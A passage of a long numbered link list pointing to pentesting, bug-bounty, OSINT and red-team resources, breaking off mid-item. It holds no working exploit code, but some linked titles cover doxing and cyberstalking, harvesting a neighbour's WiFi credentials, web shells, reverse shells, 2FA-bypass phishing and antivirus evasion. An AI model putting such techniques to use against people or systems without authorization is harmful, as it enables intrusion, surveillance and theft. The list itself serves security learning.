Penetration Tester: https://www.breachlock.com/top-5-open-source-osint-tools/ -1790-Open Source Intelligence tools for social media: my own list: https://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/ -1791-Red Teaming: I can see you! Insights from an InfoSec expert : https://www.perspectiverisk.com/i-can-see-you-osint/ -1792-OSINT Playbook for Recruiters: https://amazinghiring.com/osint-playbook/ -1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking: https://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking -1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques): https://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a -1795-Online Investigative Tools for Social Media Discovery and Locating People: https://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html -1796-Expanding Skype Forensics with OSINT: Email Accounts: http://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/ -1798-2019 OSINT Guide: https://www.randhome.io/blog/2019/01/05/2019-osint-guide/ -1799-OSINT - Passive Recon and Discovery of Assets: https://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715 -1800-OSINT With Datasploit: https://dzone.com/articles/osint-with-datasploit -1801-Building an OSINT Reconnaissance Tool from Scratch: https://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b -1802-Find Identifying Information from a Phone Number Using OSINT Tools: https://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/ -1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step): https://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/ -1804-Investigative tools for finding people online and keeping yourself safe: https://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe -1805- Full text of "The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim": https://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt -1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account: https://archive.org/details/texts?and%5B%5D=hacking&sin= -1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!: https://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326 -1808-How to Pass OSCP Like Boss: https://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d -1809-Deploy a private Burp Collaborator Server in Azure: https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70 -1810-Using Shodan Better Way! :): https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6 -1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty: https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 -1812-How we got LFI in apache Drill (Recon like a boss):: https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d -1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking: https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14 -1814-Week in OSINT #2019–19: https://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4 -1814-Week in OSINT #2019–02: https://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f -1815-Week in OSINT #2019–24: https://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f -1816-Page Admin Disclosure | Facebook Bug Bounty 2019: https://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb -1817-XSS in Edmodo within 5 Minute (My First Bug Bounty): https://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d -1818-Collection Of Bug Bounty Tip-Will Be updated daily: https://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248 -1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.: https://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6 -1820-How I found a simple bug in Facebook without any Test: https://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2 -1821-Facebook BugBounty — Disclosing page members: https://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520 -1822-Don’t underestimates the Errors They can provide good $$$ Bounty!: https://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596 -1823-Django and Web Security Headers: https://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e -1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads: https://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800 -1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program: https://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9 -1826-XSS in Microsoft subdomain: https://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631 -1827-How Angular Protects Us From XSS Attacks?: https://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95 -1828-[FUN] Bypass XSS Detection WAF: https://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e -1829-Bug Hunting Methodology(Part-2): https://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150 -1830-Learn Web Application Penetration Testing: https://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361 -1831-“Exploiting a Single Parameter”: https://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523 -1832-CORS To CSRF Attack: https://blog.usejournal.com/cors-to-csrf-attack-c33a595d441 -1833-Account Takeover Using CSRF(json-based): https://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc -1834-Bypassing Anti-CSRF with Burp Suite Session Handling: https://bestestredteam.com/tag/anti-csrf/ -1835-10 Methods to Bypass Cross Site Request Forgery (CSRF): https://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/ -1836-Exploiting CSRF on JSON endpoints with Flash and redirects: https://medium.com/p/681d4ad6b31b -1837-Finding and exploiting Cross-site request forgery (CSRF): https://securityonline.info/finding-exploiting-cross-site-request-forgery/ -1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration: https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf -1839-Synchronizer Token Pattern: No more tricks: https://medium.com/p/d2af836ccf71 -1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service: https://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1 -1841-XML External Entity(XXE): https://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b -1842-XXE Attacks— Part 1: XML Basics: https://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26 -1843-From XXE to RCE with PHP/expect — The Missing Link: https://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7 -1844-My first XML External Entity (XXE) attack with .gpx file: https://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98 -1845-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496 -1846-XXE on Windows system …then what ??: https://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745 -1847-Unauthenticated Blind SSRF in Oracle EBS CVE-2018-3167: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 -1848-SVG XLink SSRF fingerprinting libraries version: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c -1849-What is XML Injection Attack: https://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6 -1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1: https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978 -1851-Penetration Testing Introduction: Scanning & Reconnaissance: https://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f -1852-Beginner’s Guide to recon automation.: https://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb -1853-Red Teamer’s Guide to Pulse Secure SSL VPN: https://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b -1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection: https://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787 -1855-How I harvested Facebook credentials via free wifi?: https://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049 -1856-How to hack any Payment Gateway?: https://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5 -1857-How I hacked into my neighbour’s WiFi and harvested login credentials?: https://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc -1858-What do Netcat, SMTP and self XSS have in common? Stored XSS: https://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002 -1859-1-Click Account Takeover in Virgool.io — a Nice Case Study: https://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2 -1860-Digging into Android Applications — Part 1 — Drozer + Burp: https://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2 -1861-Linux for Pentester: APT Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation -1862-Linux for Pentester : ZIP Privilege Escalation: https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation -1863-Koadic - COM Command & Control Framework: https://www.hackingarticles.in/koadic-com-command-control-framework -1864-Configure Sqlmap for WEB-GUI in Kali Linux : https://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux -1865-Penetration Testing: https://www.hackingarticles.in/Penetration-Testing -1866-Buffer Overflow Examples, Code execution by shellcode : https://0xrick.github.io/binary-exploitation/bof5 -1867-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution -1868-JSC Exploits: -https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html -1869-Injecting Into The Hunt: https://jsecurity101.com/2019/Injecting-Into-The-Hunt -1870-Bypassing Antivirus with Golang: https://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it -1871-Windows Process Injection: Print Spooler: https://modexp.wordpress.com/2019/03/07/process-injection-print-spooler -1872-Inject Shellcode Into Memory Using Unicorn : https://ethicalhackingguru.com/inject-shellcode-memory-using-unicorn -1873-Macros and More with SharpShooter v2.0: https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0 -1874-Fuzz Testing(Fuzzing) Tutorial: What is, Types, Tools & Example: https://www.guru99.com/fuzz-testing -1875-Introduction to File Format Fuzzing & Exploitation: https://medium.com/@DanielC7/introduction-to-file-format-fuzzing-exploitation-922143ab2ab3 -1876-Hacking a social media account and safeguarding it: https://medium.com/@ujasdhami79/hacking-a-social-media-account-and-safeguarding-it-e5f69adf62d7 -1877-OTP Bypass on India’s Biggest Video Sharing Site: https://medium.com/bugbountywriteup/otp-bypass-on-indias-biggest-video-sharing-site-e94587c1aa89 -1879-Getting Root on macOS via 3rd Party Backup Software: https://medium.com/tenable-techblog/getting-root-on-macos-via-3rd-party-backup-software-b804085f0c9 -1880-How to Enumerate MYSQL Database using Metasploit: https://ehacking.net/2020/03/how-to-enumerate-mysql-database-using-metasploit-kali-linux-tutorial.html -1881-Exploiting Insecure Firebase Database! https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty -1882-Penetration Testing - Complete Guide: https://softwaretestinghelp.com/penetration-testing-guide -1883-How To Upload A PHP Web Shell On WordPress Site: https://1337pwn.com/how-to-upload-php-web-shell-on-wordpress-site -1884-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/tutorial/Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1885-Ethical hacking: Lateral movement techniques: https://securityboulevard.com/2019/09/ethical-hacking-lateral-movement-techniques -1886-A Pivot Cheatsheet for Pentesters: http://nullsweep.com/pivot-cheatsheet-for-pentesters -1887-What to Look for When Reverse Engineering Android Apps: http://nowsecure.com/blog/2020/02/26/what-to-look-for-when-reverse-engineering-android-apps -1888-Modlishka: Advance Phishing to Bypass 2 Factor Auth: http://crackitdown.com/2019/02/modlishka-kali-linux.html -1889-Bettercap Usage Examples (Overview, Custom setup, Caplets ): www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets -1890-The Complete Hashcat Tutorial: https://ethicalhackingguru.com/the-complete-hashcat-tutorial -1891-Wireless Wifi Penetration Testing Hacker Notes: https://executeatwill.com/2020/01/05/Wireless-Wifi-Penetration-Testing-Hacker-Notes -1892-#BugBounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1893-Kerberoasting attack: https://en.hackndo.com/kerberoasting -1894-A Pentester's Guide - Part 2 (OSINT - LinkedIn is not just for jobs): https://delta.navisec.io/osint-for-pentesters-part-2-linkedin-is-not-just-for-jobs -1895-Radare2 cutter tutorial: http://cousbox.com/axflw/radare2-cutter-tutorial.html -1896-Cracking Password Hashes with Hashcat: http://hackingvision.com/2020/03/22/cracking-password-hashes-hashcat -1897-From CSRF to RCE and WordPress-site takeover CVE-2020-8417: http://blog.wpsec.com/csrf-to-rce-wordpress -1898-Best OSINT Tools: http://pcwdld.com/osint-tools-and-software -1899-Metasploit Exploitation Tool 2020: http://cybervie.com/blog/metasploit-exploitation-tool -1900-How to exploit CVE-2020-7961: https://synacktiv.com/posts/pentest/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html -1901-PowerShell for Pentesters: https://varonis.com/blog/powershell-for-pentesters -1902-Android Pentest Tutorial: https://packetstormsecurity.com/files/156432/Android-Pentest-Tutorial-Step-By-Step.html -1903-Burp Suite Tutorial: https://pentestgeek.com/web-applications/burp-suite-tutorial-1 -1904-Company Email Enumeration + Breached Email Finder: https://metalkey.github.io/company-email-enumeration--breached-email-finder.html -1905-Kali Linux Cheat Sheet for Penetration Testers: https://github.com/NoorQureshi/kali-linux-cheatsheet -1906-Active Directory Exploitation Cheat Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory. https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#using-bloodhound -1907-Advanced Hacking Tutorials Collection: https://yeahhub.com/advanced-hacking-tutorials-collection -1908-Persistence – DLL Hijacking: https://pentestlab.blog/2020/03/04/persistence-dll-hijacking -1909-Brute force and dictionary attacks: A cheat sheet: https://techrepublic.com/article/brute-force-and-dictionary-attacks-a-cheat-sheet -1910-How to use Facebook for Open Source Investigation: https://securitynewspaper.com/2020/03/11/how-to-use-facebook-for-open-source-investigation-osint -1911-tcpdump Cheat Sheet: https://comparitech.com/net-admin/tcpdump-cheat-sheet -1912-Windows Post exploitation recon with Metasploit: https://hackercool.com/2016/10/windows-post-exploitation-recon-with-metasploit -1913-Bug Hunting Methodology: https://blog.usejournal.com/bug-hunting-methodology-part-1-91295b2d2066 -1914-Malware traffic analysis tutorial: https://apuntpsicolegs.com/veke0/malware-traffic-analysis-tutorial.html -1915-Recon-ng v5 Tutorial: https://geekwire.eu/recon-ng-v5-tutorial -1916-Windows and Linux Privilege Escalation Tools: https://yeahhub.com/windows-linux-privilege-escalation-tools-2019 -1917-Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide -1918-Phishing Windows Credentials: https://pentestlab.blog/2020/03/02/phishing-windows-credentials -1919-Getting What You're Entitled To: A Journey Into MacOS Stored Credentials: https://mdsec.co.uk/2020/02/getting-what-youre-entitled-to-a-journey-in-to-macos-stored-credentials -1920-Recent Papers Related To Fuzzing: https://wcventure.github.io/FuzzingPaper -1921-Web Shells 101 Using PHP (Web Shells Part 2): https://acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ -1922-Python3 reverse shell: https://polisediltrading.it/hai6jzbs/python3-reverse-shell.html -1923-Reverse Shell between two Linux machines: https://yeahhub.com/reverse-shell-linux-machines -1924-Tutorial - Writing Hardcoded Windows Shellcodes (32bit): https://dsolstad.com/shellcode/2020/02/02/Tutorial-Hardcoded-Writing-Hardcoded-Windows-Shellcodes-32bit.html -1925-How to Use Wireshark: Comprehensive Tutorial + Tips: https://varonis.com/blog/how-to-use-wireshark -1926-How To Use PowerShell for Privilege Escalation with Local Privilege Escalation? https://varonis.com/blog/how-to-use-powershell-for-privilege-escalation-with-local-computer-accounts -1927-Ethical hacking:Top privilege escalation techniques in Windows: https://securityboulevard.com/2020/03/ethical-hacking-top-privilege-escalation-techniques-in-windows -1928-How to Identify Company's Hacked Email Addresses: https://ehacking.net/2020/04/how-to-identify-companys-hacked-email-addresses-using-maltego-osint-haveibeenpawned.html -1929-Android APK Reverse Engineering: What's in an APK: https://secplicity.org/2019/09/11/android-apk-reverse-engineering-whats-in-an-apk -1930-Keep Calm and HackTheBox - Beep: https://freecodecamp.org/news/keep-calm-and-hack-the-box-beep/ -1931-Keep Calm and HackTheBox -Legacy: https://freecodecamp.org/news/keep-calm-and-hack-the-box-legacy/ -1932-Keep Calm and HackTheBox -Lame: https://freecodecamp.org/news/keep-calm-and-hack-the-box-lame/ -1933-HacktheBox:Writeup Walkthrough: https://hackingarticles.in/hack-the-box-writeup-walkthrough -1934-2020 OSCP Exam Preparation: https://cybersecurity.att.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp -1935-My OSCP transformation: https://kevsec.fr/journey-to-oscp-2019-write-up -1936-A Detailed Guide on OSCP Preparation: https://niiconsulting.com/checkmate/2017/06/a-detail-guide-on-oscp-preparation-from-newbie-to-oscp/ -1937-Useful Commands and Tools - #OSCP: https://yeahhub.com/useful-commands-tools-oscp/ -1938-Comprehensive Guide on Password Spraying Attack https://hackingarticles.in/comprehensive-guide-on-password-spraying-attack -1939-Privilege Escalation: https://pentestlab.blog/category/privilege-escalation/ -1940-Red Team: https://pentestlab.blog/category/red-team/ -1941-Linux post-exploitation.Advancing from user to super-user in a few clicks https://hackmag.com/security/linux-killchain/ -1942--#BugBounty Cheatsheet https://m0chan.github.io/2019/12/17/Bug-Bounty-Cheetsheet.html -1943--#Windows Notes/Cheatsheet https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html -1944-#Linux Notes/Cheatsheet https://m0chan.github.io/2018/07/31/Linux-Notes-And-Cheatsheet.html -1945-Windows Notes https://mad-coding.cn/tags/Windows/ -1946-#BlueTeam CheatSheet https://gist.github.com/SwitHak/62fa7f8df378cae3a459670e3a18742d -1947-Linux Privilege Escalation Cheatsheet for OSCP: https://hackingdream.net/2020/03/linux-privilege-escalation-cheatsheet-for-oscp.html -1948-Shodan Pentesting Guide: https://community.turgensec.com/shodan-pentesting-guide -1949-Pentesters Guide to PostgreSQL Hacking: https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 -1950-Hacking-OSCP cheatsheet: https://ceso.github.io/posts/2020/04/hacking/oscp-cheatsheet/ -1951-A Comprehensive Guide to Breaking SSH: https://community.turgensec.com/ssh-hacking-guide -1952-Windows Privilege Escalation Methods for Pentesters: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/ -1953-Best #firefox addons for #Hacking: https://twitter.com/cry__pto/status/1210836734331752449 -1954-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1955-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1956-i created this group for more in depth sharing about hacking and penetration testing /daily posts: you can join: https://facebook.com/groups/AmmarAmerHacker -1957-Directory Bruteforcing Tools: && SCREENSHOTTING Tools: https://twitter.com/cry__pto/status/1270603017256124416 -1958-S3 Bucket Enumeration Tools: https://twitter.com/cry__pto/status/1269862357645307904 -1959-Github Recon Tools: https://twitter.com/cry__pto/status/1269362041044832257 -1960-Website Mirroring Tools: https://twitter.com/cry__pto/status/1248640849812078593 -1961-automated credential discovery tools: https://twitter.com/cry__pto/status/1253214720372465665 -1962-Antiforensics Techniques: https://twitter.com/cry__pto/status/1215001674760294400 -1963-#bugbounty tools part (1): https://twitter.com/cry__pto/status/1212096231301881857 1964-Binary Analysis Frameworks: https://twitter.com/cry__pto/status/1207966421575184384 -1965-#BugBounty tools part (5): https://twitter.com/cry__pto/status/1214850754055458819 -1966-#BugBounty tools part (3): https://twitter.com/cry__pto/status/1212290510922158080 -1967-Kali Linux Commands List (Cheat Sheet): https://twitter.com/cry__pto/status/1264530546933272576 -1968-#BugBounty tools part (4): https://twitter.com/cry__pto/status/1212296173412851712 -1969--Automated enumeration tools: https://twitter.com/cry__pto/status/1214919232389099521 -1970-DNS lookup information Tools: https://twitter.com/cry__pto/status/1248639962746105863 -1971-OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1972-Social Engineering Tools: https://twitter.com/cry__pto/status/1180731438796333056 -1973-Hydra : https://twitter.com/cry__pto/status/1247507926807449600 -1974-#OSINT Your Full Guide: https://twitter.com/cry__pto/status/1244433669936349184 -1975-#BugBounty tools part (2): https://twitter.com/cry__pto/status/1212289852059860992 -1976-my own ebook library: https://twitter.com/cry__pto/status/1239308541468516354 -1977-Practice part (2): https://twitter.com/cry__pto/status/1213165695556567040 -1978-Practice part (3): https://twitter.com/cry__pto/status/1214220715337097222 -1979-my blog: https://twitter.com/cry__pto/status/1263457516672954368 -1980-Practice: https://twitter.com/cry__pto/status/1212341774569504769 -1981-how to search for XSS without proxy tool: https://twitter.com/cry__pto/status/1252558806837604352 -1982-How to collect email addresses from search engines: https://twitter.com/cry__pto/status/1058864931792138240 -1983-Hacking Tools Cheat Sheet: https://twitter.com/cry__pto/status/1255159507891687426 -1984-#OSCP Your Full Guide: https://twitter.com/cry__pto/status/1240842587927445504 -1985-#HackTheBox Your Full Guide: https://twitter.com/cry__pto/status/1241481478539816961 -1986-Web Scanners: https://twitter.com/cry__pto/status/1271826773009928194 -1987-HACKING MAGAZINES: -1-2600 — The Hacker Quarterly magazine:www.2600.com -2-Hackin9:http://hakin9.org -3-(IN)SECURE magazine:https://lnkd.in/grNM2t8 -4-PHRACK:www.phrack.org/archives -5-Hacker’s Manual 2019 -1988-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1989-Kali Linux Cheat Sheet for Hackers: https://twitter.com/cry__pto/status/1272792311236263937 -1990-Web Exploitation Tools: https://twitter.com/cry__pto/status/1272778056952885249 -1991-2020 OSCP Exam Preparation + My OSCP transformation +A Detailed Guide on OSCP Preparation + Useful Commands and Tools - #OSCP: https://twitter.com/cry__pto/status/1262089078339756032 -1992-100 Best Hacking Tools for Security Professionals in 2020: https://gbhackers.com/hacking-tools-list/ -1993-SNMP Enumeration: OpUtils:www.manageengine.com SNMP Informant:www.snmp-informant.com SNMP Scanner:www.secure-bytes.com SNMPUtil:www.wtcs.org SolarWinds:www.solarwinds.com -1994-INFO-SEC RELATED CHEAT SHEETS: https://twitter.com/cry__pto/status/1274768435361337346 -1995-METASPLOIT CHEAT SHEET: https://twitter.com/cry__pto/status/1274769179548278786 -1996-Nmap Cheat Sheet, plus bonus Nmap + Nessus: https://twitter.com/cry__pto/status/1275359087304286210 -1997-Wireshark Cheat Sheet - Commands, Captures, Filters, Shortcuts & More: https://twitter.com/cry__pto/status/1276391703906222080 -1998-learn penetration testing a great series as PDF: https://twitter.com/cry__pto/status/1277588369426526209 -1999-Detecting secrets in code committed to Gitlab (in real time): https://www.youtube.com/watch?v=eCDgUvXZ_YE -2000-Penetration Tester’s Guide to Evaluating OAuth 2.0 — Authorization Code Grants: https://maxfieldchen.com/posts/2020-05-17-penetration-testers-guide-oauth-2.html -2001-Building Virtual Machine Labs: https://github.com/da667/Building_Virtual_Machine_Labs-Live_Training -2002-Windows Kernel Exploit Cheat Sheet for [HackTheBox]: https://kakyouim.hatenablog.com/entry/2020/05/27/010807 -2003-19 Powerful Penetration Testing Tools In 2020 (Security Testing Tools): https://softwaretestinghelp.com/penetration-testing-tools/ -2004-Full Connect Scan (-sT): -complete the three-way handshake -slower than SYN scan -no need for superuser Privileges -when stealth is not required -to know for sure which port is open -when running port scan via proxies like TOR -it can be detected nmap -sT -p 80 192.168.1.110 -2005-today i learned that you can use strings command to extract email addresses from binary files: strings -n 8 /usr/bin/who | grep '@' -2005-pentest cheat sheet : https://gist.github.com/githubfoam/4d3c99383b5372ee019c8fbc7581637d -2006-Tcpdump cheat sheet : https://gist.github.com/jforge/27962c52223ea9b8003b22b8189d93fb -2007-tcpdump - reading tcp flags : https://gist.github.com/tuxfight3r/9ac030cb0d707bb446c7 -2008-CTF-Notes - Hackers Resources Galore: https://github.com/TheSecEng/CTF-notes -2009-Pentest-Cheat-Sheets: https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets -2010--2-Web Application Cheatsheet (Vulnhub): https://github.com/Ignitetechnologies/Web-Application-Cheatsheet -2011-A cheatsheet with commands that can be used to perform kerberos attacks : https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a -2012-Master Shodan Search Engine: https://rootkitpen.blogspot.com/2020/08/master-shodan-search-engine.html -2013-CTF Cheatsheet: https://github.com/uppusaikiran/awesome-ctf-cheatsheet -2014-Pentesting Cheatsheet: https://gist.github.com/jeremypruitt/c435aefa2c2abaec02985d77fb370ec5 -2015-Hacking Cheatsheet: https://github.com/kobs0N/Hacking-Cheatsheet -2016-Hashcat-Cheatsheet: https://github.com/frizb/Hashcat-Cheatsheet -2017-Wireshark Cheat Sheet: https://github.com/security-cheatsheet/wireshark-cheatsheet -2018-JustTryHarder: https://github.com/sinfulz/JustTryHarder -2019-PWK-CheatSheet: https://github.com/ibr2/pwk-cheatsheet -2020-kali linux cheatsheet: https://github.com/NoorQureshi/kali-linux-cheatsheet -2021-Hydra-Cheatsheet: https://github.com/frizb/Hydra-Cheatsheet -2022-Security Tools Cheatsheets: https://github.com/jayeshjodhawat -2023-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit: https://www.trustedsec.com/events/webinar-popping-shells-instead-of-alert-boxes-weaponizing-xss-for-fun-and-profit/ -2024-TRICKS FOR WEAPONIZING XSS: https://www.trustedsec.com/blog/tricks-for-weaponizing-xss/ -2025-OSCP Notes: https://github.com/tbowman01/OSCP-PWK-Notes-Public -2026-OSCP Notes: https://github.com/Technowlogy-Pushpender/oscp-notes -2027-list of useful commands, shells and notes related to OSCP: https://github.com/s0wr0b1ndef/OSCP-note -2028-Notes for taking the OSCP in 2097: https://github.com/dostoevskylabs/dostoevsky-pentest-notes -2029-My OSCP notes: https://github.com/tagnullde/OSCP -2030-Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor https://www.allysonomalley.com/2020/05/22/dnsobserver/ -2031-Red Team Notes: https://dmcxblue.gitbook.io/red-team-notes/ -2032-Evading Detection with Excel 4.0 Macros and the BIFF8 XLS Format: https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls -2033-ESCALATING SUBDOMAIN TAKEOVERS TO STEAL COOKIES BY ABUSING DOCUMENT.DOMAIN: https://blog.takemyhand.xyz/2019/05/escalating-subdomain-takeovers-to-steal.html -2034-[SSTI] BREAKING GO'S TEMPLATE ENGINE TO GET XSS: https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html -2035-Metasploitable 3: https://kakyouim.hatenablog.com/entry/2020/02/16/213616 -2036-Reverse engineering and modifying an Android game: https://medium.com/swlh/reverse-engineering-and-modifying-an-android-game-apk-ctf-c617151b874c -2037-Reverse Engineering The Medium App (and making all stories in it free): https://medium.com/hackernoon/dont-publish-yet-reverse-engineering-the-medium-app-and-making-all-stories-in-it-free-48c8f2695687 -2038-Android Apk Reverse Engineering: https://medium.com/@chris.yn.chen/apk-reverse-engineering-df7ed8cec191 -2039-DIY Web App Pentesting Guide: https://medium.com/@luke_83192/diy-web-app-pentesting-guide-be54b303c6eb -2040-Local Admin Access and Group Policy Don’t Mix: https://www.trustedsec.com/blog/local-admin-access-and-group-policy-dont-mix/ -2041-BREAKING TYPICAL WINDOWS HARDENING IMPLEMENTATIONS: https://www.trustedsec.com/blog/breaking-typical-windows-hardening-implementations/ -2042-Decrypting ADSync passwords - my journey into DPAPI: https://o365blog.com/post/adsync/ -2043-Ultimate Guide: PostgreSQL Pentesting: https://medium.com/@lordhorcrux_/ultimate-guide-postgresql-pentesting-989055d5551e -2044-SMB Enumeration for Penetration Testing: https://medium.com/@arnavtripathy98/smb-enumeration-for-penetration-testing-e782a328bf1b -2045-(Almost) All The Ways to File Transfer: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65 -2046-HackTheBox TartarSauce Writeup: https://kakyouim.hatenablog.com/entry/2020/05/14/230445 -2047-Kerberos-Attacks-In-Depth: https://m0chan.github.io/Kerberos-Attacks-In-Depth -2048-From Recon to Bypassing MFA Implementation in OWA by Using EWS Misconfiguration: https://medium.com/bugbountywriteup/from-recon-to-bypassing-mfa-implementation-in-owa-by-using-ews-misconfiguration-b6a3518b0a63 -2049-Writeups for infosec Capture the Flag events by team Galaxians: https://github.com/shiltemann/CTF-writeups-public -2050-Angstrom CTF 2018 — web challenges [writeup]: 